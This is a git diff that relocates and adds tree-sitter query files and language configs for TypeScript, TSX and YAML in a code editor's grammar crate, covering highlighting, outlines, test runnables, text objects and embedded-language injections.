(type_arguments))) diff --git a/crates/grammars/src/tsx/runnables.scm b/crates/grammars/src/tsx/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..db1f69a2c22e5a5dbcf7892f6c02158260c764e9 --- /dev/null +++ b/crates/grammars/src/tsx/runnables.scm @@ -0,0 +1,42 @@ +; Add support for (node:test, bun:test and Jest) runnable +; Function expression that has `it`, `test` or `describe` as the function name +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! tag js-test)) + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#any-of? @_property "each")) + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! tag js-test)) diff --git a/crates/grammars/src/tsx/textobjects.scm b/crates/grammars/src/tsx/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..7a3a4768d94f495f9654d7ba1c182d3f7a47dcb4 --- /dev/null +++ b/crates/grammars/src/tsx/textobjects.scm @@ -0,0 +1,129 @@ +(comment)+ @comment.around + +(function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(method_definition + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(function_expression + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +((arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")) @function.around + (#not-has-parent? 
@function.around variable_declarator)) + +; Arrow function in variable declaration - capture the full declaration +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) +]) @function.around + +; Arrow function in variable declaration (expression body fallback) +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) +]) @function.around + +; Catch-all for arrow functions in other contexts (callbacks, etc.) +((arrow_function + body: (_) @function.inside) @function.around + (#not-has-parent? @function.around variable_declarator)) + +(function_signature) @function.around + +(generator_function + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(generator_function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(class_declaration + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(class + body: (_ + "{" + (_)* @class.inside + "}")) @class.around + +(interface_declaration + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(enum_declaration + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(ambient_declaration + (module + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}"))) @class.around + +(internal_module + body: (_ + "{" + [ + (_) + ";"? 
+ ]* @class.inside + "}")) @class.around + +(type_alias_declaration) @class.around diff --git a/crates/grammars/src/typescript/brackets.scm b/crates/grammars/src/typescript/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f6f3a133fbe47abfcf54473beff0c73c04afaf4 --- /dev/null +++ b/crates/grammars/src/typescript/brackets.scm @@ -0,0 +1,23 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +("<" @open + ">" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/typescript/config.toml b/crates/grammars/src/typescript/config.toml similarity index 96% rename from crates/languages/src/typescript/config.toml rename to crates/grammars/src/typescript/config.toml index 67656e6a538da6c8860e9ab1b08fd6e6ee9cabbd..473a347cdd611d096e5fb3b584c2f0990da185de 100644 --- a/crates/languages/src/typescript/config.toml +++ b/crates/grammars/src/typescript/config.toml @@ -1,6 +1,7 @@ name = "TypeScript" grammar = "typescript" path_suffixes = ["ts", "cts", "mts"] +modeline_aliases = ["ts"] first_line_pattern = '^#!.*\b(?:deno run|ts-node|bun|tsx|[/ ]node)\b' line_comments = ["// "] block_comment = { start = "/*", prefix = "* ", end = "*/", tab_size = 1 } @@ -22,7 +23,6 @@ prettier_parser_name = "typescript" tab_size = 2 debuggers = ["JavaScript"] scope_opt_in_language_servers = ["tailwindcss-language-server"] -import_path_strip_regex = "(?:/index)?\\.[jt]s$" [overrides.string] completion_query_characters = ["-", "."] diff --git a/crates/grammars/src/typescript/debugger.scm b/crates/grammars/src/typescript/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..8f384fd8ad9e07fea89972464e64b905086bf580 --- /dev/null +++ b/crates/grammars/src/typescript/debugger.scm @@ -0,0 +1,51 @@ +(lexical_declaration + (variable_declarator + name: 
(identifier) @debug-variable)) + +(for_in_statement + left: (identifier) @debug-variable) + +(for_statement + initializer: (lexical_declaration + (variable_declarator + name: (identifier) @debug-variable))) + +(binary_expression + left: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(binary_expression + right: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(unary_expression + argument: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(update_expression + argument: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(return_statement + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(parenthesized_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(array + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(pair + value: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(member_expression + object: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(statement_block) @debug-scope + +(program) @debug-scope diff --git a/crates/languages/src/typescript/highlights.scm b/crates/grammars/src/typescript/highlights.scm similarity index 61% rename from crates/languages/src/typescript/highlights.scm rename to crates/grammars/src/typescript/highlights.scm index 8ec3ec26cca805c65d68d9df08037102a32494dc..0213adb10f61a4921544f4c758e51312a68ae28d 100644 --- a/crates/languages/src/typescript/highlights.scm +++ b/crates/grammars/src/typescript/highlights.scm @@ -1,46 +1,19 @@ ; Variables - (identifier) @variable (call_expression function: (member_expression object: (identifier) @type - (#any-of? 
- @type - "Promise" - "Array" - "Object" - "Map" - "Set" - "WeakMap" - "WeakSet" - "Date" - "Error" - "TypeError" - "RangeError" - "SyntaxError" - "ReferenceError" - "EvalError" - "URIError" - "RegExp" - "Function" - "Number" - "String" - "Boolean" - "Symbol" - "BigInt" - "Proxy" - "ArrayBuffer" - "DataView" - ) - ) -) + (#any-of? @type + "Promise" "Array" "Object" "Map" "Set" "WeakMap" "WeakSet" "Date" "Error" "TypeError" + "RangeError" "SyntaxError" "ReferenceError" "EvalError" "URIError" "RegExp" "Function" + "Number" "String" "Boolean" "Symbol" "BigInt" "Proxy" "ArrayBuffer" "DataView"))) ; Special identifiers - (type_annotation) @type (type_identifier) @type + (predefined_type) @type.builtin (type_alias_declaration @@ -65,49 +38,47 @@ (implements_clause (type_identifier) @type) -;; Enables ts-pretty-errors -;; The Lsp returns "snippets" of typescript, which are not valid typescript in totality, -;; but should still be highlighted -;; Highlights object literals by hijacking the statement_block pattern, but only if -;; the statement block follows an object literal pattern -((statement_block - (labeled_statement - ;; highlight the label like a property name - label: (statement_identifier) @property.name - body: [ - ;; match a terminating expression statement - (expression_statement - ;; single identifier - treat as a type name - [(identifier) @type.name - ;; object - treat as a property - type pair - (object - (pair - key: (_) @property.name - value: (_) @type.name)) - ;; subscript_expression - treat as an array declaration - (subscript_expression - object: (_) @type.name - index: (_) - ) - ;; templated string - treat each identifier contained as a type name - (template_string - (template_substitution - (identifier) @type.name)) - ]) - ;; match a nested statement block - (statement_block) @nested - ]))) +; Enables ts-pretty-errors +; The Lsp returns "snippets" of typescript, which are not valid typescript in totality, +; but should still be highlighted +; 
Highlights object literals by hijacking the statement_block pattern, but only if +; the statement block follows an object literal pattern +(statement_block + (labeled_statement + ; highlight the label like a property name + label: (statement_identifier) @property.name + body: [ + ; match a terminating expression statement + (expression_statement + ; single identifier - treat as a type name + [ + (identifier) @type.name + ; object - treat as a property - type pair + (object + (pair + key: (_) @property.name + value: (_) @type.name)) + ; subscript_expression - treat as an array declaration + (subscript_expression + object: (_) @type.name + index: (_)) + ; templated string - treat each identifier contained as a type name + (template_string + (template_substitution + (identifier) @type.name)) + ]) + ; match a nested statement block + (statement_block) @nested + ])) ; Inline type imports: import { type Foo } or import { type Foo as Bar } (import_specifier "type" - name: (identifier) @type -) + name: (identifier) @type) (import_specifier "type" - alias: (identifier) @type -) + alias: (identifier) @type) ; Full type imports: import type { Foo } or import type { Foo as Bar } (import_statement @@ -115,45 +86,41 @@ (import_clause (named_imports (import_specifier - name: (identifier) @type - ) - ) - ) -) + name: (identifier) @type)))) (import_statement "type" (import_clause (named_imports (import_specifier - alias: (identifier) @type - ) - ) - ) -) + alias: (identifier) @type)))) ([ (identifier) (shorthand_property_identifier) (shorthand_property_identifier_pattern) - ] @constant - (#match? @constant "^_*[A-Z_][A-Z\\d_]*$")) +] @constant + (#match? 
@constant "^_*[A-Z_][A-Z\\d_]*$")) ; Properties - (property_identifier) @property + (shorthand_property_identifier) @property + (shorthand_property_identifier_pattern) @property + (private_property_identifier) @property ; Function and method calls - (call_expression function: (identifier) @function) (call_expression function: (member_expression - property: [(property_identifier) (private_property_identifier)] @function.method)) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method)) (new_expression constructor: (identifier) @type) @@ -162,38 +129,60 @@ module: (identifier) @type) ; Function and method definitions - (function_expression name: (identifier) @function) + (function_declaration name: (identifier) @function) + (method_definition - name: [(property_identifier) (private_property_identifier)] @function.method) + name: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + (method_definition - name: (property_identifier) @constructor - (#eq? @constructor "constructor")) + name: (property_identifier) @constructor + (#eq? 
@constructor "constructor")) (pair - key: [(property_identifier) (private_property_identifier)] @function.method - value: [(function_expression) (arrow_function)]) + key: [ + (property_identifier) + (private_property_identifier) + ] @function.method + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (member_expression - property: [(property_identifier) (private_property_identifier)] @function.method) - right: [(function_expression) (arrow_function)]) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + right: [ + (function_expression) + (arrow_function) + ]) (variable_declarator name: (identifier) @function - value: [(function_expression) (arrow_function)]) + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (identifier) @function - right: [(function_expression) (arrow_function)]) + right: [ + (function_expression) + (arrow_function) + ]) (arrow_function) @function ; Parameters - (required_parameter (identifier) @variable.parameter) @@ -227,8 +216,8 @@ name: (identifier) @variable.parameter) ; Literals - (this) @variable.special + (super) @variable.special [ @@ -247,8 +236,7 @@ (undefined) (true) (false) - ] @type.builtin -) + ] @type.builtin) (comment) @comment @@ -263,11 +251,12 @@ (escape_sequence) @string.escape (regex) @string.regex + (regex_flags) @keyword.operator.regex + (number) @number ; Tokens - [ ";" "?." @@ -326,14 +315,14 @@ "..." ] @operator -(regex "/" @string.regex) +(regex + "/" @string.regex) (ternary_expression [ "?" 
":" - ] @operator -) + ] @operator) [ "(" @@ -342,7 +331,7 @@ "]" "{" "}" -] @punctuation.bracket +] @punctuation.bracket (template_substitution "${" @punctuation.special @@ -360,31 +349,32 @@ "<" @punctuation.bracket ">" @punctuation.bracket) -(decorator "@" @punctuation.special) +(decorator + "@" @punctuation.special) (union_type - ("|") @punctuation.special) + "|" @punctuation.special) (intersection_type - ("&") @punctuation.special) + "&" @punctuation.special) (type_annotation - (":") @punctuation.special) + ":" @punctuation.special) (index_signature - (":") @punctuation.special) + ":" @punctuation.special) (type_predicate_annotation - (":") @punctuation.special) + ":" @punctuation.special) (public_field_definition - ("?") @punctuation.special) + "?" @punctuation.special) (property_signature - ("?") @punctuation.special) + "?" @punctuation.special) (method_signature - ("?") @punctuation.special) + "?" @punctuation.special) (optional_parameter ([ @@ -393,12 +383,10 @@ ]) @punctuation.special) ; Keywords - [ "abstract" "as" "async" - "await" "debugger" "declare" "default" @@ -448,6 +436,7 @@ ] @keyword.import [ + "await" "break" "case" "catch" @@ -465,4 +454,5 @@ "yield" ] @keyword.control -(switch_default "default" @keyword.control) +(switch_default + "default" @keyword.control) diff --git a/crates/grammars/src/typescript/indents.scm b/crates/grammars/src/typescript/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..2715d2567194f00a9566e9b0c385ae8aa6258df0 --- /dev/null +++ b/crates/grammars/src/typescript/indents.scm @@ -0,0 +1,28 @@ +[ + (call_expression) + (assignment_expression) + (member_expression) + (lexical_declaration) + (variable_declaration) + (assignment_expression) + ; below handled by `(_ "{" "}" @end) @indent` + ; (if_statement) + ; (for_statement) + ; (while_statement) +] @indent + +(_ + "[" + "]" @end) @indent + +(_ + "<" + ">" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent diff --git 
a/crates/grammars/src/typescript/injections.scm b/crates/grammars/src/typescript/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..a8cf9a41b5f90a6b9d02358b1b6073286fbe86ac --- /dev/null +++ b/crates/grammars/src/typescript/injections.scm @@ -0,0 +1,199 @@ +((comment) @injection.content + (#set! injection.language "comment")) + +(((comment) @_jsdoc_comment + (#match? @_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content + (#set! injection.language "jsdoc")) + +(((comment) @_reference + (#match? @_reference "^///\\s+\\s*$")) @injection.content + (#set! injection.language "html")) + +((regex) @injection.content + (#set! injection.language "regex")) + +(call_expression + function: (identifier) @_name + (#eq? @_name "css") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (member_expression + object: (identifier) @_obj + (#eq? @_obj "styled") + property: (property_identifier)) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (call_expression + function: (identifier) @_name + (#eq? @_name "styled")) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "html") + arguments: (template_string) @injection.content + (#set! injection.language "html")) + +(call_expression + function: (identifier) @_name + (#eq? @_name "js") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "javascript"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "json") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "json"))) + +(call_expression + function: (identifier) @_name + (#eq? 
@_name "sql") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "sql"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "ts") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "typescript"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^ya?ml$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "yaml"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql")))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^iso$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "isograph")))) + +; Angular Component template injection +(call_expression + function: [ + (identifier) @_decorator + (#eq? @_decorator "Component") + (member_expression + property: (property_identifier) @_decorator + (#eq? @_decorator "Component")) + ] + arguments: (arguments + (object + (pair + key: (property_identifier) @_prop + (#eq? @_prop "template") + value: [ + (string) @injection.content + (template_string) @injection.content + (template_string + (string_fragment) @injection.content) + ]))) + (#set! injection.language "angular")) + +; Angular Component styles injection +(call_expression + function: [ + (identifier) @_decorator + (#eq? @_decorator "Component") + (member_expression + property: (property_identifier) @_decorator + (#eq? @_decorator "Component")) + ] + arguments: (arguments + (object + (pair + key: (property_identifier) @_prop + (#eq? 
@_prop "styles") + value: [ + (string) @injection.content + (template_string) @injection.content + (template_string + (string_fragment) @injection.content) + (array + (string) @injection.content) + (array + (template_string) @injection.content) + (array + (template_string + (string_fragment)) @injection.content) + ]))) + (#set! injection.language "css")) + +; Parse the contents of strings and tagged template +; literals with leading ECMAScript comments: +; '/* html */' or '/*html*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") + (#set! injection.language "html")) + +; '/* sql */' or '/*sql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") + (#set! injection.language "sql")) + +; '/* gql */' or '/*gql*/' +; '/* graphql */' or '/*graphql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") + (#set! injection.language "graphql")) + +; '/* css */' or '/*css*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") + (#set! 
injection.language "css")) diff --git a/crates/grammars/src/typescript/outline.scm b/crates/grammars/src/typescript/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..37991965256a0def9b0458958ac4e50c6f337af6 --- /dev/null +++ b/crates/grammars/src/typescript/outline.scm @@ -0,0 +1,275 @@ +(internal_module + "namespace" @context + name: (_) @name) @item + +(enum_declaration + "enum" @context + name: (_) @name) @item + +(type_alias_declaration + "type" @context + name: (_) @name) @item + +(function_declaration + "async"? @context + "function" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(generator_function_declaration + "async"? @context + "function" @context + "*" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(interface_declaration + "interface" @context + name: (_) @name) @item + +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Exported array destructuring +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Exported object destructuring +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Top-level array destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + 
(variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Top-level object destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(class_declaration + "class" @context + name: (_) @name) @item + +(abstract_class_declaration + "abstract" @context + "class" @context + name: (_) @name) @item + +; Method definitions in classes (not in object literals) +(class_body + (method_definition + [ + "get" + "set" + "async" + "*" + "readonly" + "static" + (override_modifier) + (accessibility_modifier) + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item) + +; Object literal methods +(variable_declarator + value: (object + (method_definition + [ + "get" + "set" + "async" + "*" + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item)) + +(public_field_definition + [ + "declare" + "readonly" + "abstract" + "static" + (accessibility_modifier) + ]* @context + name: (_) @name) @item + +; Add support for (node:test, bun:test and Jest) runnable +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] @context + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . 
+ [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#any-of? @_property "each")) + arguments: (arguments + . + [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Object properties +(pair + key: [ + (property_identifier) @name + (string + (string_fragment) @name) + (number) @name + (computed_property_name) @name + ]) @item + +; Nested variables in function bodies +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Nested array destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Nested object destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(comment) @annotation diff --git a/crates/grammars/src/typescript/overrides.scm b/crates/grammars/src/typescript/overrides.scm new file mode 100644 index 0000000000000000000000000000000000000000..f5e99cad68a91695d9d0b19b308e3ce19f75555a --- /dev/null +++ b/crates/grammars/src/typescript/overrides.scm @@ -0,0 +1,11 @@ +(comment) @comment.inclusive + +(string) @string + +(template_string + (string_fragment) 
@string) + +(_ + value: (call_expression + function: (identifier) @function_name_before_type_arguments + type_arguments: (type_arguments))) diff --git a/crates/grammars/src/typescript/runnables.scm b/crates/grammars/src/typescript/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..38fee610e85f2aa2f5f7f7c58caf79b3c6a3d1ed --- /dev/null +++ b/crates/grammars/src/typescript/runnables.scm @@ -0,0 +1,71 @@ +; Add support for (node:test, bun:test, Jest and Deno.test) runnable +; Function expression that has `it`, `test` or `describe` as the function name +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! tag js-test)) + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#any-of? @_property "each")) + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! tag js-test)) + +; Add support for Deno.test with string names +((call_expression + function: (member_expression + object: (identifier) @_namespace + property: (property_identifier) @_method) + (#eq? @_namespace "Deno") + (#eq? @_method "test") + arguments: (arguments + . + [ + (string + (string_fragment) @run @DENO_TEST_NAME) + (identifier) @run @DENO_TEST_NAME + ])) @_js-test + (#set! 
tag js-test)) + +; Add support for Deno.test with named function expressions +((call_expression + function: (member_expression + object: (identifier) @_namespace + property: (property_identifier) @_method) + (#eq? @_namespace "Deno") + (#eq? @_method "test") + arguments: (arguments + . + (function_expression + name: (identifier) @run @DENO_TEST_NAME))) @_js-test + (#set! tag js-test)) diff --git a/crates/grammars/src/typescript/textobjects.scm b/crates/grammars/src/typescript/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..384ea482352dfb1f617357bd3af719a64425d876 --- /dev/null +++ b/crates/grammars/src/typescript/textobjects.scm @@ -0,0 +1,130 @@ +(comment)+ @comment.around + +(function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(method_definition + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(function_expression + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +((arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")) @function.around + (#not-has-parent? @function.around variable_declarator)) + +; Arrow function in variable declaration - capture the full declaration +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) +]) @function.around + +; Arrow function in variable declaration - capture body as @function.inside +; (for statement blocks, the more specific pattern above captures just the contents) +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) +]) @function.around + +; Catch-all for arrow functions in other contexts (callbacks, etc.) 
+((arrow_function + body: (_) @function.inside) @function.around + (#not-has-parent? @function.around variable_declarator)) + +(function_signature) @function.around + +(generator_function + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(generator_function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(class_declaration + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(class + body: (_ + "{" + (_)* @class.inside + "}")) @class.around + +(interface_declaration + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(enum_declaration + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(ambient_declaration + (module + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}"))) @class.around + +(internal_module + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(type_alias_declaration) @class.around diff --git a/crates/grammars/src/yaml/brackets.scm b/crates/grammars/src/yaml/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..edeb53a0d313846089e716bedff4256e2b47d94e --- /dev/null +++ b/crates/grammars/src/yaml/brackets.scm @@ -0,0 +1,13 @@ +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/yaml/config.toml b/crates/grammars/src/yaml/config.toml similarity index 96% rename from crates/languages/src/yaml/config.toml rename to crates/grammars/src/yaml/config.toml index 9a07a560b06766ac00dd73b6210023c4cddd491d..95fe81d04dbbb88e1c7deed7a84895cddb7dea1d 100644 --- a/crates/languages/src/yaml/config.toml +++ b/crates/grammars/src/yaml/config.toml @@ -1,6 +1,7 @@ name = "YAML" grammar = "yaml" path_suffixes = ["yml", "yaml", "pixi.lock", "clang-format", "clangd", "bst"] +modeline_aliases = ["yml"] line_comments = ["# "] autoclose_before = ",]}" brackets = [ diff --git a/crates/languages/src/yaml/highlights.scm b/crates/grammars/src/yaml/highlights.scm similarity index 78% rename from crates/languages/src/yaml/highlights.scm rename to crates/grammars/src/yaml/highlights.scm index dfecf3f9d421cf1a574ce03dccfeb1201d8086a9..1d9c97c17a7925e5e9d87ed8e3bfba51c9b11d8b 100644 --- a/crates/languages/src/yaml/highlights.scm +++ b/crates/grammars/src/yaml/highlights.scm @@ -1,4 +1,5 @@ (boolean_scalar) @boolean + (null_scalar) @constant.builtin [ @@ -25,30 +26,31 @@ key: (flow_node [ - (plain_scalar (string_scalar)) + (plain_scalar + (string_scalar)) (double_quote_scalar) (single_quote_scalar) ] @property) [ - "," - "-" - ":" - ">" - "?" - "|" + "," + "-" + ":" + ">" + "?" + "|" ] @punctuation.delimiter [ - "[" - "]" - "{" - "}" + "[" + "]" + "{" + "}" ] @punctuation.bracket [ - "*" - "&" - "---" - "..." + "*" + "&" + "---" + "..." ] @punctuation.special diff --git a/crates/grammars/src/yaml/injections.scm b/crates/grammars/src/yaml/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2b94b7f0cdd9d18c3c7157d9bd4adfd1b59ea061 --- /dev/null +++ b/crates/grammars/src/yaml/injections.scm @@ -0,0 +1,26 @@ +((comment) @injection.content + (#set! 
injection.language "comment")) + +; GitHub actions: JavaScript for workflow scripting (inline and block) +(block_mapping + (block_mapping_pair + key: (flow_node) @_uses + (#eq? @_uses "uses") + value: (flow_node) @_actions_ghs + (#match? @_actions_ghs "^actions/github-script")) + (block_mapping_pair + key: (flow_node) @_with + (#eq? @_with "with") + value: (block_node + (block_mapping + (block_mapping_pair + key: (flow_node) @_run + (#eq? @_run "script") + value: [ + (flow_node + (plain_scalar + (string_scalar) @injection.content)) + (block_node + (block_scalar) @injection.content) + ] + (#set! injection.language "javascript")))))) diff --git a/crates/grammars/src/yaml/outline.scm b/crates/grammars/src/yaml/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..a41447bf64cceadd1ae3d59bd2804e85bd5e8c39 --- /dev/null +++ b/crates/grammars/src/yaml/outline.scm @@ -0,0 +1,7 @@ +(block_mapping_pair + key: (flow_node + (plain_scalar + (string_scalar) @name)) + value: (flow_node + (plain_scalar + (string_scalar) @context))?) 
